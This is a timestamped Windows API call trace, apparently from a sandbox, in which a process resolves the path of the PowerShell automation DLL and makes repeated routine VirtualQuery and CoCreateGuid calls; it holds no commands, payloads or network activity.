	[0054.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.879] GetLastError () returned 0x0
	[0054.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.879] GetLastError () returned 0x0
	[0054.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.880] GetLastError () returned 0x0
	[0054.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.880] GetLastError () returned 0x0
	[0054.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.880] GetLastError () returned 0x0
	[0054.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.880] GetLastError () returned 0x0
	[0054.880] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x2b06feb8, Data2=0x48f7, Data3=0x4a7f, Data4=([0]=0xad, [1]=0x6a, [2]=0xb4, [3]=0xd9, [4]=0xd6, [5]=0xa5, [6]=0x3e, [7]=0x2d))) returned 0x0
	[0054.881] VirtualQuery (in: lpAddress=0x22cb34, lpBuffer=0x22db34, dwLength=0x1c | out: lpBuffer=0x22db34*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.881] GetLastError () returned 0x0
	[0054.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.881] GetLastError () returned 0x0
	[0054.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.881] GetLastError () returned 0x0
	[0054.881] VirtualQuery (in: lpAddress=0x22cb34, lpBuffer=0x22db34, dwLength=0x1c | out: lpBuffer=0x22db34*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.882] VirtualQuery (in: lpAddress=0x22cb70, lpBuffer=0x22db70, dwLength=0x1c | out: lpBuffer=0x22db70*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d528, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.882] GetLastError () returned 0x0
	[0054.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d4d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.882] GetLastError () returned 0x0
	[0054.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d4d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.882] GetLastError () returned 0x0
	[0054.882] VirtualQuery (in: lpAddress=0x22cb34, lpBuffer=0x22db34, dwLength=0x1c | out: lpBuffer=0x22db34*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.882] VirtualQuery (in: lpAddress=0x22cb70, lpBuffer=0x22db70, dwLength=0x1c | out: lpBuffer=0x22db70*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d528, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.883] GetLastError () returned 0x0
	[0054.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d4d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.883] GetLastError () returned 0x0
	[0054.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d4d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.883] GetLastError () returned 0x0
	[0054.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.883] GetLastError () returned 0x0
	[0054.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.883] GetLastError () returned 0x0
	[0054.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.883] GetLastError () returned 0x0
	[0054.883] VirtualQuery (in: lpAddress=0x22cb34, lpBuffer=0x22db34, dwLength=0x1c | out: lpBuffer=0x22db34*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.884] VirtualQuery (in: lpAddress=0x22cb70, lpBuffer=0x22db70, dwLength=0x1c | out: lpBuffer=0x22db70*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.884] VirtualQuery (in: lpAddress=0x22cb34, lpBuffer=0x22db34, dwLength=0x1c | out: lpBuffer=0x22db34*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.884] VirtualQuery (in: lpAddress=0x22cb70, lpBuffer=0x22db70, dwLength=0x1c | out: lpBuffer=0x22db70*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.885] VirtualQuery (in: lpAddress=0x22cb34, lpBuffer=0x22db34, dwLength=0x1c | out: lpBuffer=0x22db34*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.885] VirtualQuery (in: lpAddress=0x22cb70, lpBuffer=0x22db70, dwLength=0x1c | out: lpBuffer=0x22db70*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.885] VirtualQuery (in: lpAddress=0x22cb34, lpBuffer=0x22db34, dwLength=0x1c | out: lpBuffer=0x22db34*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.886] VirtualQuery (in: lpAddress=0x22cb70, lpBuffer=0x22db70, dwLength=0x1c | out: lpBuffer=0x22db70*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.886] VirtualQuery (in: lpAddress=0x22ced8, lpBuffer=0x22ded8, dwLength=0x1c | out: lpBuffer=0x22ded8*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.887] VirtualQuery (in: lpAddress=0x22cf14, lpBuffer=0x22df14, dwLength=0x1c | out: lpBuffer=0x22df14*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.887] VirtualQuery (in: lpAddress=0x22ced8, lpBuffer=0x22ded8, dwLength=0x1c | out: lpBuffer=0x22ded8*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.888] VirtualQuery (in: lpAddress=0x22cf14, lpBuffer=0x22df14, dwLength=0x1c | out: lpBuffer=0x22df14*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.888] VirtualQuery (in: lpAddress=0x22cf14, lpBuffer=0x22df14, dwLength=0x1c | out: lpBuffer=0x22df14*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.888] VirtualQuery (in: lpAddress=0x22ced8, lpBuffer=0x22ded8, dwLength=0x1c | out: lpBuffer=0x22ded8*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.888] VirtualQuery (in: lpAddress=0x22cf14, lpBuffer=0x22df14, dwLength=0x1c | out: lpBuffer=0x22df14*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.888] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0xe82b4a3b, Data2=0x536f, Data3=0x44de, Data4=([0]=0xbe, [1]=0xad, [2]=0x2f, [3]=0xdd, [4]=0xc8, [5]=0x58, [6]=0x44, [7]=0xc0))) returned 0x0
	[0054.889] VirtualQuery (in: lpAddress=0x22cf04, lpBuffer=0x22df04, dwLength=0x1c | out: lpBuffer=0x22df04*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.889] VirtualQuery (in: lpAddress=0x22cf04, lpBuffer=0x22df04, dwLength=0x1c | out: lpBuffer=0x22df04*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.890] VirtualQuery (in: lpAddress=0x22cf40, lpBuffer=0x22df40, dwLength=0x1c | out: lpBuffer=0x22df40*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.890] VirtualQuery (in: lpAddress=0x22cf04, lpBuffer=0x22df04, dwLength=0x1c | out: lpBuffer=0x22df04*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.890] VirtualQuery (in: lpAddress=0x22cf40, lpBuffer=0x22df40, dwLength=0x1c | out: lpBuffer=0x22df40*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.890] VirtualQuery (in: lpAddress=0x22cf04, lpBuffer=0x22df04, dwLength=0x1c | out: lpBuffer=0x22df04*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.891] VirtualQuery (in: lpAddress=0x22cf40, lpBuffer=0x22df40, dwLength=0x1c | out: lpBuffer=0x22df40*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.891] VirtualQuery (in: lpAddress=0x22cf04, lpBuffer=0x22df04, dwLength=0x1c | out: lpBuffer=0x22df04*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.892] VirtualQuery (in: lpAddress=0x22cf40, lpBuffer=0x22df40, dwLength=0x1c | out: lpBuffer=0x22df40*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.892] VirtualQuery (in: lpAddress=0x22cf04, lpBuffer=0x22df04, dwLength=0x1c | out: lpBuffer=0x22df04*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.892] VirtualQuery (in: lpAddress=0x22cf40, lpBuffer=0x22df40, dwLength=0x1c | out: lpBuffer=0x22df40*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.892] VirtualQuery (in: lpAddress=0x22cf04, lpBuffer=0x22df04, dwLength=0x1c | out: lpBuffer=0x22df04*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.893] VirtualQuery (in: lpAddress=0x22cf40, lpBuffer=0x22df40, dwLength=0x1c | out: lpBuffer=0x22df40*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.893] VirtualQuery (in: lpAddress=0x22ced8, lpBuffer=0x22ded8, dwLength=0x1c | out: lpBuffer=0x22ded8*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.893] VirtualQuery (in: lpAddress=0x22cf14, lpBuffer=0x22df14, dwLength=0x1c | out: lpBuffer=0x22df14*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.894] VirtualQuery (in: lpAddress=0x22ced8, lpBuffer=0x22ded8, dwLength=0x1c | out: lpBuffer=0x22ded8*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.894] VirtualQuery (in: lpAddress=0x22cf14, lpBuffer=0x22df14, dwLength=0x1c | out: lpBuffer=0x22df14*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.894] VirtualQuery (in: lpAddress=0x22cf14, lpBuffer=0x22df14, dwLength=0x1c | out: lpBuffer=0x22df14*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.895] VirtualQuery (in: lpAddress=0x22ced8, lpBuffer=0x22ded8, dwLength=0x1c | out: lpBuffer=0x22ded8*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.895] VirtualQuery (in: lpAddress=0x22cf14, lpBuffer=0x22df14, dwLength=0x1c | out: lpBuffer=0x22df14*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.895] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0xda3e7fc2, Data2=0xeab9, Data3=0x493b, Data4=([0]=0xaf, [1]=0x6e, [2]=0xbf, [3]=0x8c, [4]=0xe8, [5]=0xf, [6]=0xff, [7]=0xbe))) returned 0x0
	[0054.896] VirtualQuery (in: lpAddress=0x22ced8, lpBuffer=0x22ded8, dwLength=0x1c | out: lpBuffer=0x22ded8*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.896] VirtualQuery (in: lpAddress=0x22cf14, lpBuffer=0x22df14, dwLength=0x1c | out: lpBuffer=0x22df14*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.896] VirtualQuery (in: lpAddress=0x22ced8, lpBuffer=0x22ded8, dwLength=0x1c | out: lpBuffer=0x22ded8*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.897] VirtualQuery (in: lpAddress=0x22cf14, lpBuffer=0x22df14, dwLength=0x1c | out: lpBuffer=0x22df14*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.897] VirtualQuery (in: lpAddress=0x22cf14, lpBuffer=0x22df14, dwLength=0x1c | out: lpBuffer=0x22df14*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.897] VirtualQuery (in: lpAddress=0x22ced8, lpBuffer=0x22ded8, dwLength=0x1c | out: lpBuffer=0x22ded8*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.897] VirtualQuery (in: lpAddress=0x22cf14, lpBuffer=0x22df14, dwLength=0x1c | out: lpBuffer=0x22df14*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.898] VirtualQuery (in: lpAddress=0x22ced8, lpBuffer=0x22ded8, dwLength=0x1c | out: lpBuffer=0x22ded8*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.898] VirtualQuery (in: lpAddress=0x22cf14, lpBuffer=0x22df14, dwLength=0x1c | out: lpBuffer=0x22df14*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.898] VirtualQuery (in: lpAddress=0x22ced8, lpBuffer=0x22ded8, dwLength=0x1c | out: lpBuffer=0x22ded8*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.899] VirtualQuery (in: lpAddress=0x22cf14, lpBuffer=0x22df14, dwLength=0x1c | out: lpBuffer=0x22df14*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.899] VirtualQuery (in: lpAddress=0x22cd7c, lpBuffer=0x22dd7c, dwLength=0x1c | out: lpBuffer=0x22dd7c*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.899] VirtualQuery (in: lpAddress=0x22ced8, lpBuffer=0x22ded8, dwLength=0x1c | out: lpBuffer=0x22ded8*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.899] VirtualQuery (in: lpAddress=0x22cf14, lpBuffer=0x22df14, dwLength=0x1c | out: lpBuffer=0x22df14*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.900] VirtualQuery (in: lpAddress=0x22ced8, lpBuffer=0x22ded8, dwLength=0x1c | out: lpBuffer=0x22ded8*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.900] VirtualQuery (in: lpAddress=0x22cf14, lpBuffer=0x22df14, dwLength=0x1c | out: lpBuffer=0x22df14*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.900] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x23ce29f0, Data2=0x2576, Data3=0x4077, Data4=([0]=0xac, [1]=0x37, [2]=0x60, [3]=0x72, [4]=0x0, [5]=0xc2, [6]=0xa4, [7]=0xb))) returned 0x0
	[0054.900] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x7b28ad21, Data2=0x4774, Data3=0x4e38, Data4=([0]=0xad, [1]=0x6a, [2]=0xe5, [3]=0x16, [4]=0x67, [5]=0x5f, [6]=0xbf, [7]=0x78))) returned 0x0
	[0054.901] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0xf7c1063, Data2=0x17d6, Data3=0x4e58, Data4=([0]=0xb4, [1]=0xdb, [2]=0x92, [3]=0x6e, [4]=0xbb, [5]=0x48, [6]=0x57, [7]=0x5f))) returned 0x0
	[0054.901] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0xaad8f07f, Data2=0xc77d, Data3=0x4782, Data4=([0]=0xb9, [1]=0xb3, [2]=0x18, [3]=0xcf, [4]=0x8c, [5]=0x65, [6]=0x7, [7]=0xc0))) returned 0x0
	[0054.902] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x4fafd209, Data2=0x55e4, Data3=0x4bfd, Data4=([0]=0xbe, [1]=0xb0, [2]=0xe9, [3]=0x6d, [4]=0xbd, [5]=0xf9, [6]=0x88, [7]=0x37))) returned 0x0
	[0054.902] VirtualQuery (in: lpAddress=0x22ce0c, lpBuffer=0x22de0c, dwLength=0x1c | out: lpBuffer=0x22de0c*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.903] VirtualQuery (in: lpAddress=0x22ce48, lpBuffer=0x22de48, dwLength=0x1c | out: lpBuffer=0x22de48*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.903] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x686c6690, Data2=0x6c21, Data3=0x4d8f, Data4=([0]=0xb6, [1]=0xec, [2]=0x35, [3]=0x1c, [4]=0x1c, [5]=0x73, [6]=0xdd, [7]=0xbc))) returned 0x0
	[0054.903] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0xf1ab23ee, Data2=0x78db, Data3=0x4c70, Data4=([0]=0xb6, [1]=0xc, [2]=0x1e, [3]=0xf2, [4]=0xa6, [5]=0x67, [6]=0x12, [7]=0x4))) returned 0x0
	[0054.903] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x3ca2991c, Data2=0xa6e3, Data3=0x4ee2, Data4=([0]=0x88, [1]=0x49, [2]=0x5, [3]=0xef, [4]=0x26, [5]=0x7e, [6]=0x99, [7]=0x2d))) returned 0x0
